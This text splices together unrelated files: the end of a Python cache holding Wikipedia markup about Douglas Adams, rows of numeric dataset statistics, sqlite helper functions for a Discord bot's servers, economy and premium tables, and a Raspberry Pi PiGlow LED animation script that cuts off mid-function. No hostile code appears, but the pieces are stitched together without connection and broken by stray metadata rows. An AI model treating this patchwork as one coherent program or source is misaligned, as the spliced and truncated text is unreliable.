Library Journal, 128(11), 124.\n* Preying on composite materials. (2003). R&D Magazine, 45(6), 44.\n* Webb, N. (2003). The Berkeley Hotel hostage. Bookseller, (5069), 25.\n* The author who toured the universe. (2003). Bookseller, (5060), 35.\n* Osmond, A. (2005). Only human. Sight & Sound, 15(5), 12–15.\n* Culture vulture. (2005). Times Educational Supplement, (4640), 19.\n* Maughan, S. (2005). Audio Bestsellers/Fiction. Publishers Weekly, 252(30), 17.\n* Hitchhiker At The Science Museum. (2005). In Britain, 14(10), 9.\n* Rea, A. (2005). The Adams asteroids. New Scientist, 185(2488), 31.\n* Most Improbable Adventure. (2005). Popular Mechanics, 182(5), 32.\n* The Hitchhiker's Guide To The Galaxy: The Tertiary Phase. (2005). Publishers Weekly, 252(14), 21.\n* Bartelt, K. R. (2005). Wish You Were Here: The Official Biography of Douglas Adams. Library Journal, 130(4), 86.\n* Larsen, D. (2005). I was a teenage android. New Zealand Listener, 198(3390), 37–38.\n* Tanner, J. C. (2005). Simplicity: it's hard. Telecom Asia, 16(6), 6.\n* Nielsen Bookscan Charts. (2005). Bookseller, (5175), 18–21.\n* Buena Vista launches regional site to push Hitchhiker's movie. (2005). New Media Age, 9.\n* Shynola bring Beckland to life. (2005). Creative Review, 25(3), 24–26.\n* Carwardine, M. (15 September 2007). The baiji: So long and thanks for all the fish. New Scientist. pp.&nbsp;50–53.\n* Czarniawska, B. (2008). Accounting and gender across times and places: An excursion into fiction. Accounting, Organizations & Society, 33(1), 33–47.\n* Pope, M. (2008). Life, the Universe, Religion and Science. Issues, (82), 31–34.\n* Bearne, S. (2008). BBC builds site to trail Last Chance To See TV series. New Media Age, 08.\n* Arrow to reissue Adams. (2008). Bookseller, (5352), 14.\n* Page, B. (2008). Colfer is new Hitchhiker. Bookseller, (5350), 7.\n* I've got a perfect puzzle for you. (2009). Bookseller, (5404), 42.\n* Mostly Harmless.... (2009). 
Bookseller, (5374), 46.\n* Penguin and PanMac hitch a ride together. (2009). Bookseller, (5373), 6.\n* Adams, Douglas. Britannica Biographies [serial online]. October 2010;:1\n* Douglas (Noël) Adams (1952–2001). Hutchinson's Biography Database [serial online]. July 2011;:1\n* My life in books. (2011). Times Educational Supplement, (4940), 27.\n<template lineStart=\"1\"><title>Refend</title></template>\n\n<h level=\"3\" i=\"25\">===Other===</h>\n* <template><title>Wayback </title><part><name>df</name><equals>=</equals><value>yes</value></part><part><name>date</name><equals>=</equals><value>20110720193159 </value></part><part><name>url</name><equals>=</equals><value>http://www.douglasadams.com/ </value></part><part><name>title</name><equals>=</equals><value>Adams's official web site </value></part></template>, established by him, and still operated by [[The Digital Village]]\n* <template><title>TED speaker</title><part><name index=\"1\"/><value>douglas_adams</value></part></template>\n* [http://www.biota.org/people/douglasadams/ Douglas Adams speech at Digital Biota 2 (1998)] [http://www.biota.org/podcast/#DNA (The audio of the speech)]\n* [http://www.guardian.co.uk/books/2008/jun/09/douglasadams Guardian Books "Author Page"], with profile and links to further articles.\n* <template><title>Worldcat id</title><part><name>id</name><equals>=</equals><value>lccn-n80-76765</value></part></template>\n* [http://www.vintagemacworld.com/iifx.html Douglas Adams & his Computer] article about his Mac IIfx\n* BBC2 "Omnibus" tribute to Adams, presented by Kirsty Wark, 4 August 2001\n* Mueller, Rick and Greengrass, Joel (2002). ''Life, The Universe and Douglas Adams'', documentary.\n* Simpson, M.J. (2001). ''The Pocket Essential Hitchhiker's Guide''. ISBN 1-903047-40-4. 
Updated April 2005 ISBN 1-904048-46-3\n* [http://www.bbc.co.uk/programmes/p00fpvbm Special edition of BBC Book Club featuring Douglas Adams], first broadcast 2 January 2000 on BBC Radio 4\n\n<h level=\"2\" i=\"26\">==External links==</h>\n<template lineStart=\"1\"><title>Library resources box\n </title><part><name>by</name><equals>=</equals><value>yes\n </value></part><part><name>viaf</name><equals>=</equals><value>113230702\n </value></part><part><name>label</name><equals>=</equals><value>Douglas Adams</value></part></template>\n<template lineStart=\"1\"><title>Spoken Wikipedia-2</title><part><name index=\"1\"/><value>2006-02-11</value></part><part><name index=\"2\"/><value>Douglas_Adams_Part_1.ogg</value></part><part><name index=\"3\"/><value>Douglas_Adams_Part_2.ogg</value></part></template>\n* <template><title>Commons category-inline</title></template>\n* <template><title>Wikiquote-inline</title></template>\n* <template><title>Find a Grave</title><part><name index=\"1\"/><value>22814</value></part></template>\n* <template><title>IMDb name</title><part><name index=\"1\"/><value>0010930</value></part></template>\n* [http://towelday.org/ Towel Day, 25 May]\n\n<template lineStart=\"1\"><title>s-start</title></template>\n<template lineStart=\"1\"><title>s-bef</title><part><name>before</name><equals>=</equals><value> [[Anthony Read]]</value></part></template> \n<template lineStart=\"1\"><title>s-ttl</title><part><name>title</name><equals>=</equals><value>''[[Doctor Who]]'' script editor</value></part><part><name>years</name><equals>=</equals><value>1979–80</value></part></template> \n<template lineStart=\"1\"><title>s-aft</title><part><name>after</name><equals>=</equals><value> [[Christopher H. 
Bidmead]]</value></part></template>\n<template lineStart=\"1\"><title>s-end</title></template>\n<template lineStart=\"1\"><title>Douglas Adams</title></template>\n<template lineStart=\"1\"><title>HitchhikerBooks</title></template>\n<template lineStart=\"1\"><title>Dirk Gently</title></template>\n<template lineStart=\"1\"><title>Doctor Who</title></template>\n<template lineStart=\"1\"><title>Infocom games</title></template>\n<template lineStart=\"1\"><title>animal rights</title><part><name>state</name><equals>=</equals><value>collapsed</value></part></template>\n\n<template lineStart=\"1\"><title>Authority control</title></template>\n\n<template lineStart=\"1\"><title>DEFAULTSORT:Adams, Douglas</title></template>\n[[Category:Douglas Adams| ]]\n[[Category:1952 births]]\n[[Category:2001 deaths]]\n[[Category:Alumni of St John's College, Cambridge]]\n[[Category:Animal rights advocates]]\n[[Category:Atheism activists]]\n[[Category:Audio book narrators]]\n[[Category:British social commentators]]\n[[Category:BBC radio producers]]\n[[Category:British child writers]]\n[[Category:Burials at Highgate Cemetery]]\n[[Category:English atheists]]\n[[Category:English comedy writers]]\n[[Category:English humanists]]\n[[Category:English humorists]]\n[[Category:English radio writers]]\n[[Category:English science fiction writers]]\n[[Category:English television writers]]\n[[Category:Infocom]]\n[[Category:Interactive fiction writers]]\n[[Category:Monty Python]]\n[[Category:Non-fiction environmental writers]]\n[[Category:People educated at Brentwood School (Essex)]]\n[[Category:People from Cambridge]]\n[[Category:Usenet people]]\n[[Category:Critics of religions]]\n[[Category:20th-century English novelists]]\n[[Category:21st-century British novelists]]</root>"
}
}
"""
cache = {'query': query, 'response': response}
| 11,401.457143 | 252,351 | 0.721028 | 67,227 | 399,051 | 4.231395 | 0.053401 | 0.020354 | 0.031006 | 0.00914 | 0.836 | 0.800931 | 0.769556 | 0.735633 | 0.705404 | 0.674809 | 0 | 0.039085 | 0.083142 | 399,051 | 34 | 252,352 | 11,736.794118 | 0.737925 | 0.00005 | 0 | 0 | 0 | 0.133333 | 0.99983 | 0.409594 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.1 | 0.1 | 0 | 0.1 | 0.1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 11 |
cc40f8ad15cfe29f31f39949f49cd9aa1f12a1c2 | 8,189 | py | Python | main1.py | Wumpuspro/Alpha-bot | 6ed21d152e60f62384f606b3e3b3f98c8e32e3a9 | [
"MIT"
] | null | null | null | main1.py | Wumpuspro/Alpha-bot | 6ed21d152e60f62384f606b3e3b3f98c8e32e3a9 | [
"MIT"
] | null | null | null | main1.py | Wumpuspro/Alpha-bot | 6ed21d152e60f62384f606b3e3b3f98c8e32e3a9 | [
"MIT"
] | null | null | null | import sqlite3
# SQLite helpers for the bot's date.db database.
# Every statement uses sqlite3 "?" parameter substitution instead of string
# formatting, so user-supplied values cannot alter the SQL itself.

DB_PATH = "date.db"


def _execute(sql, params=()):
    """Run a write statement and commit it."""
    con = sqlite3.connect(DB_PATH)
    con.execute(sql, params)
    con.commit()
    con.close()


def _fetch_one(sql, params=()):
    """Return the first matching row, or None."""
    con = sqlite3.connect(DB_PATH)
    row = con.execute(sql, params).fetchone()
    con.close()
    return row


def _fetch_all(sql, params=()):
    """Return every matching row."""
    con = sqlite3.connect(DB_PATH)
    rows = con.execute(sql, params).fetchall()
    con.close()
    return rows


# ---------------- servers ----------------
def add_server(server_id, status, role_id):
    _execute("insert into servers(server_id, status, role) values(?, ?, ?);",
             (server_id, status, role_id))


def all_servers():
    return _fetch_all("select * from servers;")


def get_server(id):
    return _fetch_one("select * from servers where server_id = ?;", (id,))


def delete_server(id):
    _execute("delete from servers where server_id = ?;", (id,))


# ---------------- warns ----------------
def get_warns():
    return _fetch_all("select * from warns;")


def add_warn(server_id):
    _execute("insert into warns(server_id, amount) values(?, 1);", (server_id,))


def get_amount(server_id):
    # The warn count sits in the third column of the warns row.
    return _fetch_one("select * from warns where server_id = ?;", (server_id,))[2]


def add_amount(server_id):
    amount = get_amount(server_id) + 1
    _execute("update warns set amount = ? where server_id = ?;", (amount, server_id))


# ---------------- greet ----------------
def get_greet():
    return _fetch_all("select * from greet;")


def add_greet(server_id, channel_id):
    # New greet channels start with a greetdel value of 4.
    _execute("insert into greet(server_id, channel_id, greetdel) values(?, ?, 4);",
             (server_id, channel_id))


def update_greet(channel_id, time):
    _execute("update greet set greetdel = ? where channel_id = ?;", (time, channel_id))


def remove_greet(channel_id):
    _execute("delete from greet where channel_id = ?;", (channel_id,))


# ---------------- economy ----------------
def get_users():
    return _fetch_all("select * from economy;")


def add_user(user_id):
    # New users start with no money and a 'Computer' in their inventory.
    _execute("insert into economy(user_id, balance, inventory) values(?, 0, 'Computer');",
             (user_id,))


def get_info(user_id):
    return _fetch_one("select * from economy where user_id = ?;", (user_id,))


def add_money(user_id, money):
    balance = get_info(user_id)[2] + money
    _execute("update economy set balance = ? where user_id = ?;", (balance, user_id))


def give_money(user_ids, money):
    add_money(user_ids, money)


def remove_money(user_id, amount):
    add_money(user_id, -amount)


def share_money(user_id, user_ids, money):
    """Transfer money from user_id to user_ids."""
    add_money(user_ids, money)
    add_money(user_id, -money)


def add_inventory(user_id, name):
    # Parameter substitution also fixes the original unquoted-string bug here.
    _execute("update economy set inventory = ? where user_id = ?;", (name, user_id))


# ---------------- premium ----------------
def get_codes():
    return _fetch_all("select * from premium;")


def add_code(code):
    _execute("insert into premium(code) values(?);", (code,))


def remove_code(code):
    _execute("delete from premium where code = ?;", (code,))


def get_premiumservers():
    return _fetch_all("select * from premiumservers;")


def add_premium(server_id):
    _execute("insert into premiumservers(server_id) values(?);", (server_id,))


# ---------------- fun commands ----------------
def get_funcmd():
    return _fetch_all("select * from funcmd;")


def add_funcmd(user_id):
    _execute("insert into funcmd(user_id) values(?);", (user_id,))


def remove_funcmd(user_id):
    _execute("delete from funcmd where user_id = ?;", (user_id,))


# ---------------- chatbot ----------------
def get_chatbot():
    return _fetch_all("select * from chatbot;")


def add_chatbot(channel_id):
    _execute("insert into chatbot(channel_id) values(?);", (channel_id,))


def remove_chatbot(channel_id):
    _execute("delete from chatbot where channel_id = ?;", (channel_id,))


# ---------------- join channels ----------------
def get_join_channels():
    return _fetch_all("select * from joinchannel;")


def add_joinchannel(guild_id, channel_id):
    _execute("insert into joinchannel(guild_id, channel_id) values(?, ?);",
             (guild_id, channel_id))


def remove_joinchannel(channel_id):
    _execute("delete from joinchannel where channel_id = ?;", (channel_id,))
| 26.162939 | 99 | 0.632312 | 1,161 | 8,189 | 4.345392 | 0.062877 | 0.075322 | 0.114569 | 0.141526 | 0.843806 | 0.802577 | 0.776809 | 0.775619 | 0.757384 | 0.67889 | 0 | 0.009415 | 0.221761 | 8,189 | 312 | 100 | 26.246795 | 0.782206 | 0 | 0 | 0.714801 | 0 | 0 | 0.259372 | 0.041763 | 0 | 0 | 0 | 0 | 0 | 1 | 0.122744 | false | 0 | 0.00361 | 0 | 0.169675 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
cc8b8f175556606eab470de9096bdeb49fbb87c6 | 103,915 | py | Python | Programs/random_snakes.py | ShineTop/PiGlow | 3b87aca3a36a9cc2076ccebdccc5eb7a61855aa7 | [
"MIT"
] | 5 | 2018-03-16T19:09:50.000Z | 2022-02-06T21:37:35.000Z | Programs/random_snakes.py | Breakfast-for-Pigeons/PiGlow | 3b87aca3a36a9cc2076ccebdccc5eb7a61855aa7 | [
"MIT"
] | 3 | 2018-10-02T16:06:19.000Z | 2020-03-01T19:07:31.000Z | Programs/random_snakes.py | ShineTop/PiGlow | 3b87aca3a36a9cc2076ccebdccc5eb7a61855aa7 | [
"MIT"
] | 1 | 2017-11-03T13:36:35.000Z | 2017-11-03T13:36:35.000Z | #!/usr/bin/env python3
"""
Random Snakes
This program chooses a random snake function.
....................
Functions:
- snake_12: Lights up the LEDs on arms 1 and 2
- snake_13: Lights up the LEDs on arms 1 and 3
- snake_23: Lights up the LEDs on arms 2 and 3
- fading_snake_12: Lights up the LEDs on arms 1 and 2 and fades them
- fading_snake_13: Lights up the LEDs on arms 1 and 3 and fades them
- fading_snake_23: Lights up the LEDs on arms 2 and 3 and fades them
- slithering_snake_12: Lights up then turns off the LEDs on arms 1 and 2
- slithering_snake_13: Lights up then turns off the LEDs on arms 1 and 3
- slithering_snake_21: Lights up then turns off the LEDs on arms 2 and 1
- slithering_snake_23: Lights up then turns off the LEDs on arms 2 and 3
- slithering_snake_31: Lights up then turns off the LEDs on arms 3 and 1
- slithering_snake_32: Lights up then turns off the LEDs on arms 3 and 2
- slithering_fading_snake_12: Lights up then fades the LEDs on arms 1 and 2
- slithering_fading_snake_13: Lights up then fades the LEDs on arms 1 and 3
- slithering_fading_snake_21: Lights up then fades the LEDs on arms 2 and 1
- slithering_fading_snake_23: Lights up then fades the LEDs on arms 2 and 3
- slithering_fading_snake_31: Lights up then fades the LEDs on arms 3 and 1
- slithering_fading_snake_32: Lights up then fades the LEDs on arms 3 and 2
- pulsing_snake_12: Lights up and pulses the LEDs on arms 1 and 2
- pulsing_snake_13: Lights up and pulses the LEDs on arms 1 and 3
- pulsing_snake_23: Lights up and pulses the LEDs on arms 2 and 3
- explode_snake_12_or_21: Lights up and turns off the LEDs on arms 1 and 2
- explode_snake_13_or_31: Lights up and turns off the LEDs on arms 1 and 3
- explode_snake_23_or_32: Lights up and turns off the LEDs on arms 2 and 3
- slithering_fizzling_fading_snake_12: Lights up the LEDs on arms 1 and 2
- slithering_fizzling_fading_snake_13: Lights up the LEDs on arms 1 and 3
- slithering_fizzling_fading_snake_21: Lights up the LEDs on arms 2 and 1
- slithering_fizzling_fading_snake_23: Lights up the LEDs on arms 2 and 3
- slithering_fizzling_fading_snake_31: Lights up the LEDs on arms 3 and 1
- slithering_fizzling_fading_snake_32: Lights up the LEDs on arms 3 and 2
- fizzling_snake_12_or_21: Fades the LEDs on arms 1 and 2
- fizzling_snake_13_or_31: Fades the LEDs on arms 1 and 3
- fizzling_snake_23_or_32: Fades the LEDs on arms 2 and 3
....................
Requirements:
PyGlow.py (many thanks to benleb for this program)
bfp_piglow_modules.py
You will have these files if you downloaded the entire repository.
....................
Author: Paul Ryan
This program was written on a Raspberry Pi using the Geany IDE.
"""
########################################################################
# Import modules #
########################################################################
import random
import logging
from time import sleep
from PyGlow import PyGlow
from bfp_piglow_modules import print_header
from bfp_piglow_modules import check_log_directory
from bfp_piglow_modules import delete_empty_logs
from bfp_piglow_modules import stop
########################################################################
# Initialize #
########################################################################
PYGLOW = PyGlow()
PYGLOW.all(0)
########################################################################
# Lists #
########################################################################
# Snake 12 LEDs
SNAKE_12_LEDS = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 18]
# Snake 13 LEDs
SNAKE_13_LEDS = [1, 2, 3, 4, 5, 12, 13, 14, 15, 16, 17, 18]
# Snake 23 LEDs
SNAKE_23_LEDS = [6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17]
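Each list above chains two of the PiGlow's three six-LED arms, so any two snakes overlap in the six LEDs of their shared arm and together they cover all 18 LEDs. A quick sanity check of that property (using throwaway set copies of the lists):

```python
# Set copies of the three snake paths defined above.
SNAKE_12 = {1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 18}
SNAKE_13 = {1, 2, 3, 4, 5, 12, 13, 14, 15, 16, 17, 18}
SNAKE_23 = {6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17}

# Together the three snakes cover all 18 PiGlow LEDs...
assert SNAKE_12 | SNAKE_13 | SNAKE_23 == set(range(1, 19))
# ...and each pair of snakes shares exactly one six-LED arm.
assert len(SNAKE_12 & SNAKE_13) == len(SNAKE_12 & SNAKE_23) == len(SNAKE_13 & SNAKE_23) == 6
```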
########################################################################
# Functions #
########################################################################
def snake_12():
"""
Lights up the LEDs on arms 1 and 2
"""
LOGGER.debug("SNAKE 12")
PYGLOW.set_leds(SNAKE_12_LEDS, 100)
PYGLOW.update_leds()
sleep(2)
PYGLOW.set_leds(SNAKE_12_LEDS, 0)
PYGLOW.update_leds()
def snake_13():
"""
Lights up the LEDs on arms 1 and 3
"""
LOGGER.debug("SNAKE 13")
PYGLOW.set_leds(SNAKE_13_LEDS, 100)
PYGLOW.update_leds()
sleep(2)
PYGLOW.set_leds(SNAKE_13_LEDS, 0)
PYGLOW.update_leds()
def snake_23():
"""
Lights up the LEDs on arms 2 and 3
"""
LOGGER.debug("SNAKE 23")
PYGLOW.set_leds(SNAKE_23_LEDS, 100)
PYGLOW.update_leds()
sleep(2)
PYGLOW.set_leds(SNAKE_23_LEDS, 0)
PYGLOW.update_leds()
def fading_snake_12():
    """
    Lights up the LEDs on arms 1 and 2 and fades them
    """
    LOGGER.debug("FADING SNAKE 12")
    # Step the brightness down from 100 to 10, then switch the LEDs off
    for brightness in range(100, 0, -10):
        PYGLOW.set_leds(SNAKE_12_LEDS, brightness)
        PYGLOW.update_leds()
        sleep(0.1)
    PYGLOW.set_leds(SNAKE_12_LEDS, 0)
    PYGLOW.update_leds()
def fading_snake_13():
    """
    Lights up the LEDs on arms 1 and 3 and fades them
    """
    LOGGER.debug("FADING SNAKE 13")
    # Step the brightness down from 100 to 10, then switch the LEDs off
    for brightness in range(100, 0, -10):
        PYGLOW.set_leds(SNAKE_13_LEDS, brightness)
        PYGLOW.update_leds()
        sleep(0.1)
    PYGLOW.set_leds(SNAKE_13_LEDS, 0)
    PYGLOW.update_leds()
def fading_snake_23():
    """
    Lights up the LEDs on arms 2 and 3 and fades them
    """
    LOGGER.debug("FADING SNAKE 23")
    # Step the brightness down from 100 to 10, then switch the LEDs off
    for brightness in range(100, 0, -10):
        PYGLOW.set_leds(SNAKE_23_LEDS, brightness)
        PYGLOW.update_leds()
        sleep(0.1)
    PYGLOW.set_leds(SNAKE_23_LEDS, 0)
    PYGLOW.update_leds()
def slithering_snake_12():
    """
    Lights up then turns off the LEDs on arms 1 and 2
    """
    LOGGER.debug("SLITHERING SNAKE 12")
    sleep_speed = 0.10
    # The order in which the snake crosses arms 1 and 2
    led_order = [1, 2, 3, 4, 5, 6, 18, 11, 10, 9, 8, 7]
    # Light up Snake 12
    for led in led_order:
        PYGLOW.led(led, 100)
        sleep(sleep_speed)
    # Turn off Snake 12 (no pause after the last LED)
    for led in led_order[:-1]:
        PYGLOW.led(led, 0)
        sleep(sleep_speed)
    PYGLOW.led(led_order[-1], 0)

def slithering_snake_13():
    """
    Lights up then turns off the LEDs on arms 1 and 3
    """
    LOGGER.debug("SLITHERING SNAKE 13")
    sleep_speed = 0.10
    # LEDs in the order the snake slithers
    snake_leds = (1, 2, 3, 4, 5, 12, 18, 17, 16, 15, 14, 13)
    # Light up Snake 13
    for led in snake_leds:
        PYGLOW.led(led, 100)
        sleep(sleep_speed)
    # Turn off Snake 13
    for led in snake_leds[:-1]:
        PYGLOW.led(led, 0)
        sleep(sleep_speed)
    PYGLOW.led(snake_leds[-1], 0)

def slithering_snake_21():
    """
    Lights up then turns off the LEDs on arms 2 and 1
    """
    LOGGER.debug("SLITHERING SNAKE 21")
    sleep_speed = 0.10
    # LEDs in the order the snake slithers
    snake_leds = (7, 8, 9, 10, 11, 18, 6, 5, 4, 3, 2, 1)
    # Light up Snake 21
    for led in snake_leds:
        PYGLOW.led(led, 100)
        sleep(sleep_speed)
    # Turn off Snake 21
    for led in snake_leds[:-1]:
        PYGLOW.led(led, 0)
        sleep(sleep_speed)
    PYGLOW.led(snake_leds[-1], 0)

def slithering_snake_23():
    """
    Lights up then turns off the LEDs on arms 2 and 3
    """
    LOGGER.debug("SLITHERING SNAKE 23")
    sleep_speed = 0.10
    # LEDs in the order the snake slithers
    snake_leds = (7, 8, 9, 10, 11, 12, 6, 17, 16, 15, 14, 13)
    # Light up Snake 23
    for led in snake_leds:
        PYGLOW.led(led, 100)
        sleep(sleep_speed)
    # Turn off Snake 23
    for led in snake_leds[:-1]:
        PYGLOW.led(led, 0)
        sleep(sleep_speed)
    PYGLOW.led(snake_leds[-1], 0)

def slithering_snake_31():
    """
    Lights up then turns off the LEDs on arms 3 and 1
    """
    LOGGER.debug("SLITHERING SNAKE 31")
    sleep_speed = 0.10
    # LEDs in the order the snake slithers
    snake_leds = (13, 14, 15, 16, 17, 18, 12, 5, 4, 3, 2, 1)
    # Light up Snake 31
    for led in snake_leds:
        PYGLOW.led(led, 100)
        sleep(sleep_speed)
    # Turn off Snake 31
    for led in snake_leds[:-1]:
        PYGLOW.led(led, 0)
        sleep(sleep_speed)
    PYGLOW.led(snake_leds[-1], 0)

def slithering_snake_32():
    """
    Lights up then turns off the LEDs on arms 3 and 2
    """
    LOGGER.debug("SLITHERING SNAKE 32")
    sleep_speed = 0.10
    # LEDs in the order the snake slithers
    snake_leds = (13, 14, 15, 16, 17, 6, 12, 11, 10, 9, 8, 7)
    # Light up Snake 32
    for led in snake_leds:
        PYGLOW.led(led, 100)
        sleep(sleep_speed)
    # Turn off Snake 32
    for led in snake_leds[:-1]:
        PYGLOW.led(led, 0)
        sleep(sleep_speed)
    PYGLOW.led(snake_leds[-1], 0)

def slithering_fading_snake_12():
    """
    Lights up then fades the LEDs on arms 1 and 2
    """
    LOGGER.debug("SLITHERING FADING SNAKE 12")
    sleep_speed = 0.01
    # Snake segments in slithering order: head, body 1 - 10, tail
    snake_leds = (1, 2, 3, 4, 5, 6, 18, 11, 10, 9, 8, 7)
    num_leds = len(snake_leds)
    # Each step lights the next segment at brightness 120, then dims
    # every segment already lit by a further 10, so a fading trail
    # follows the head; once a segment reaches 0 it stays off
    for step in range(2 * num_leds):
        if step < num_leds:
            PYGLOW.led(snake_leds[step], 120)
            sleep(sleep_speed)
        for i in range(max(0, step - num_leds), min(step, num_leds)):
            PYGLOW.led(snake_leds[i], 120 - 10 * (step - i))
            sleep(sleep_speed)

def slithering_fading_snake_13():
    """
    Lights up then fades the LEDs on arms 1 and 3
    """
    LOGGER.debug("SLITHERING FADING SNAKE 13")
    sleep_speed = 0.01
    # Snake segments in slithering order: head, body 1 - 10, tail
    snake_leds = (1, 2, 3, 4, 5, 12, 18, 17, 16, 15, 14, 13)
    num_leds = len(snake_leds)
    # Each step lights the next segment at brightness 120, then dims
    # every segment already lit by a further 10, so a fading trail
    # follows the head; once a segment reaches 0 it stays off
    for step in range(2 * num_leds):
        if step < num_leds:
            PYGLOW.led(snake_leds[step], 120)
            sleep(sleep_speed)
        for i in range(max(0, step - num_leds), min(step, num_leds)):
            PYGLOW.led(snake_leds[i], 120 - 10 * (step - i))
            sleep(sleep_speed)

def slithering_fading_snake_21():
    """
    Lights up then fades the LEDs on arms 2 and 1
    """
    LOGGER.debug("SLITHERING FADING SNAKE 21")
    sleep_speed = 0.01
    # Snake segments in slithering order: head, body 1 - 10, tail
    snake_leds = (7, 8, 9, 10, 11, 18, 6, 5, 4, 3, 2, 1)
    num_leds = len(snake_leds)
    # Each step lights the next segment at brightness 120, then dims
    # every segment already lit by a further 10, so a fading trail
    # follows the head; once a segment reaches 0 it stays off
    for step in range(2 * num_leds):
        if step < num_leds:
            PYGLOW.led(snake_leds[step], 120)
            sleep(sleep_speed)
        for i in range(max(0, step - num_leds), min(step, num_leds)):
            PYGLOW.led(snake_leds[i], 120 - 10 * (step - i))
            sleep(sleep_speed)

def slithering_fading_snake_23():
    """
    Lights up then fades the LEDs on arms 2 and 3
    """
    LOGGER.debug("SLITHERING FADING SNAKE 23")
    sleep_speed = 0.01
    # Snake segments in slithering order: head, body 1 - 10, tail
    snake_leds = (7, 8, 9, 10, 11, 12, 6, 17, 16, 15, 14, 13)
    num_leds = len(snake_leds)
    # Each step lights the next segment at brightness 120, then dims
    # every segment already lit by a further 10, so a fading trail
    # follows the head; once a segment reaches 0 it stays off
    for step in range(2 * num_leds):
        if step < num_leds:
            PYGLOW.led(snake_leds[step], 120)
            sleep(sleep_speed)
        for i in range(max(0, step - num_leds), min(step, num_leds)):
            PYGLOW.led(snake_leds[i], 120 - 10 * (step - i))
            sleep(sleep_speed)
def slithering_fading_snake_31():
"""
Lights up then fades the LEDs on arms 3 and 1
"""
LOGGER.debug("SLITHERING FADING SNAKE 31")
sleep_speed = 0.01
# Turn on Snake Head
PYGLOW.led(13, 120)
sleep(sleep_speed)
# Turn on Snake Body 1
PYGLOW.led(14, 120)
sleep(sleep_speed)
# Fade Head
PYGLOW.led(13, 110)
sleep(sleep_speed)
# Turn on Snake Body 2
PYGLOW.led(15, 120)
sleep(sleep_speed)
# Fade Head and Body 1
PYGLOW.led(13, 100)
sleep(sleep_speed)
PYGLOW.led(14, 110)
sleep(sleep_speed)
# Turn on Snake Body 3
PYGLOW.led(16, 120)
sleep(sleep_speed)
# Fade Head and Body 1 - 2
PYGLOW.led(13, 90)
sleep(sleep_speed)
PYGLOW.led(14, 100)
sleep(sleep_speed)
PYGLOW.led(15, 110)
sleep(sleep_speed)
# Turn on Snake Body 4
PYGLOW.led(17, 120)
sleep(sleep_speed)
# Fade Head and Body 1 - 3
PYGLOW.led(13, 80)
sleep(sleep_speed)
PYGLOW.led(14, 90)
sleep(sleep_speed)
PYGLOW.led(15, 100)
sleep(sleep_speed)
PYGLOW.led(16, 110)
sleep(sleep_speed)
# Turn on Snake Body 5
PYGLOW.led(18, 120)
sleep(sleep_speed)
# Fade Head and Body 1 - 4
PYGLOW.led(13, 70)
sleep(sleep_speed)
PYGLOW.led(14, 80)
sleep(sleep_speed)
PYGLOW.led(15, 90)
sleep(sleep_speed)
PYGLOW.led(16, 100)
sleep(sleep_speed)
PYGLOW.led(17, 110)
sleep(sleep_speed)
# Turn on Snake Body 6
PYGLOW.led(12, 120)
sleep(sleep_speed)
# Fade Head and Body 1 - 5
PYGLOW.led(13, 60)
sleep(sleep_speed)
PYGLOW.led(14, 70)
sleep(sleep_speed)
PYGLOW.led(15, 80)
sleep(sleep_speed)
PYGLOW.led(16, 90)
sleep(sleep_speed)
PYGLOW.led(17, 100)
sleep(sleep_speed)
PYGLOW.led(18, 110)
sleep(sleep_speed)
# Turn on Snake Body 7
PYGLOW.led(5, 120)
sleep(sleep_speed)
# Fade Head and Body 1 - 6
PYGLOW.led(13, 50)
sleep(sleep_speed)
PYGLOW.led(14, 60)
sleep(sleep_speed)
PYGLOW.led(15, 70)
sleep(sleep_speed)
PYGLOW.led(16, 80)
sleep(sleep_speed)
PYGLOW.led(17, 90)
sleep(sleep_speed)
PYGLOW.led(18, 100)
sleep(sleep_speed)
PYGLOW.led(12, 110)
sleep(sleep_speed)
# Turn on Snake Body 8
PYGLOW.led(4, 120)
sleep(sleep_speed)
# Fade Head and Body 1 - 7
PYGLOW.led(13, 40)
sleep(sleep_speed)
PYGLOW.led(14, 50)
sleep(sleep_speed)
PYGLOW.led(15, 60)
sleep(sleep_speed)
PYGLOW.led(16, 70)
sleep(sleep_speed)
PYGLOW.led(17, 80)
sleep(sleep_speed)
PYGLOW.led(18, 90)
sleep(sleep_speed)
PYGLOW.led(12, 100)
sleep(sleep_speed)
PYGLOW.led(5, 110)
sleep(sleep_speed)
# Turn on Snake Body 9
PYGLOW.led(3, 120)
sleep(sleep_speed)
# Fade Head and Body 1 - 8
PYGLOW.led(13, 30)
sleep(sleep_speed)
PYGLOW.led(14, 40)
sleep(sleep_speed)
PYGLOW.led(15, 50)
sleep(sleep_speed)
PYGLOW.led(16, 60)
sleep(sleep_speed)
PYGLOW.led(17, 70)
sleep(sleep_speed)
PYGLOW.led(18, 80)
sleep(sleep_speed)
PYGLOW.led(12, 90)
sleep(sleep_speed)
PYGLOW.led(5, 100)
sleep(sleep_speed)
PYGLOW.led(4, 110)
sleep(sleep_speed)
# Turn on Snake Body 10
PYGLOW.led(2, 120)
sleep(sleep_speed)
# Fade Head and Body 1 - 9
PYGLOW.led(13, 20)
sleep(sleep_speed)
PYGLOW.led(14, 30)
sleep(sleep_speed)
PYGLOW.led(15, 40)
sleep(sleep_speed)
PYGLOW.led(16, 50)
sleep(sleep_speed)
PYGLOW.led(17, 60)
sleep(sleep_speed)
PYGLOW.led(18, 70)
sleep(sleep_speed)
PYGLOW.led(12, 80)
sleep(sleep_speed)
PYGLOW.led(5, 90)
sleep(sleep_speed)
PYGLOW.led(4, 100)
sleep(sleep_speed)
PYGLOW.led(3, 110)
sleep(sleep_speed)
# Turn on Snake Tail
PYGLOW.led(1, 120)
sleep(sleep_speed)
